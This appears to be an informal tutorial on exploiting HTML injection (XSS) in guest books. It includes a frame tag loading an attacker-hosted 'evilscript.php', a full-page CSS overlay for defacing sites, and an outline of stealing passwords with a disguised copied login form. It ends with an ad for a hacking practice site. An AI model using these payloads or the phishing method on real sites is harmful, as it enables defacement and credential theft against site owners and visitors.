So you have found a guest book which allows for HTML injection, so what now, wha

t can you do?

You can do alot of interesting stuff with HTML injection (Which is actually call
ed XSS).
Like what...
So we know that we can enter HTML into the page, chances are if the owner hasn't
stopped you putting HTML into the page, chances are they wont have stopped you
putting PHP into the page (this will only work if the website is hosted on a hos
t which has PHP installed for the users, most hosts allow for PHP pages i believ
e).
But what if you can't inject PHP into the guest book
Ok so you can't inject PHP directly into the guest book, unlucky.
But its not the end of the world, lets think through HTML and think what we migh
t be able to use here, what allows us to put things into a webpage without havin
g the processing done on that website...
IFRAME, FRAME, EMBED, APPLET
FRAME, IFRAME
Lets think you want to get a php page on to a website which only accepts HTML, s
o lets give it some HTML.
Code:
<frame src="http://www.yoursite.org/evilscript.php">
Now what does this do?
What it does is it creates an area on the page (this can be defined by using the
height and width parameters) which basically shows what is on the page that you
have used (in this case http://www.yoursite.org/evilscript.php).
Please note, that all processing of information is done where this is hosted.
EMBED, APPLET
Now for all you clever clogs who can write stuff in things like java, flash etc.
you could write something in that language which could get information for you
or some other task (im not going to go into alot of detail due to not knowing ja
va, flash or what you are able to do with these)
Please note, that all processing of information is done where this is hosted.
Ok we can put things onto the website, but you can't really do much to the websi
te can you, you can't deface it or get passwords.
Well we can but this involves another element of HTML, STYLE.
What this does is it defines how something comes up on a page so you can write a
style to make anything in the bold tages(<b>) to be font arial font-color blue,
or something like that
Wow we can make the thing look nice but that doesn't help us get passwords or de
face the website.
I'll start with defacing the website.
There is a couple of things that style can do which are very useful...
Z-INDEX, what this does is define what layer of the page your information is.
The default level is 0, this is the original webpage.
1 is above 0 therefore if you set something to be z-index = 1 then it will be ab
ove the information on level 0. which is the original webpage.
-1 is below 0 therefore is you set something to be z-index = -1 then it will be
below the informatin on level 0, this will mean that what you put would be hidde
n behind the original website.
POSITION, what this does is define where on the page what you have used position
on will be displayed, for this I will only go into absolute position but there
is also relative position.
With this you define exactly where you want something to be placed. There are tw
o parameters to absolute position, top and left. This is how far from the top of
the browser area you want something and how far from the left of the browser ar
ea you want something.
HIEGHT and WIDTH, what this does is define what size something is.
Now lets combine all those together, what would happen if you set...
z-index to 1
position top = 0
postition left = 0
height = 100%
width = 100%
on an something
Well it would cover the entire page.
That would be very useful for defacing the website.
Here is some example code of what something like this would look like.
Code:
<style>
#elem
{
z-index: 1;
position: absolute;
top: 0;
left: 0;
width: 100%;
height: 100%;
background-color: black;
color: red;
}
</style>
<div id=elem>
<p align=center>
<b>You have been Hacked...<br>
By Me<br></b>
</p>
</div>
But what about getting passwords
Well if you can cover their web page with your own, maybe you can take their sou
rce code put that into what has been given above, change the form which allows t
hem to login, to send you the information instead, obviously this is very obviou
s, so you will have to think of ways of changing this method to make sure you do
nt make it obvious of what has just happened.
Practicing HTML Injection/XSS
If anyone is interested in practicing what i have been talking about here, on my
website i have created an area (completely secure) which will allow you to try
this on differen't levels of filtering.
Each user has their own area (which only that user can access) so there is no wo
rries about using that and then finding someone has stolen your information.
The website is Learn2Hack.Net
You need to be a member of Learn2Hack in order to access the practice area.
You will need to go to "Practice Area's" then to "XSS" then you choose either Gu
est book 1 (which has a small amount of filtering) or Guest book 2 (which has mo
re filtering).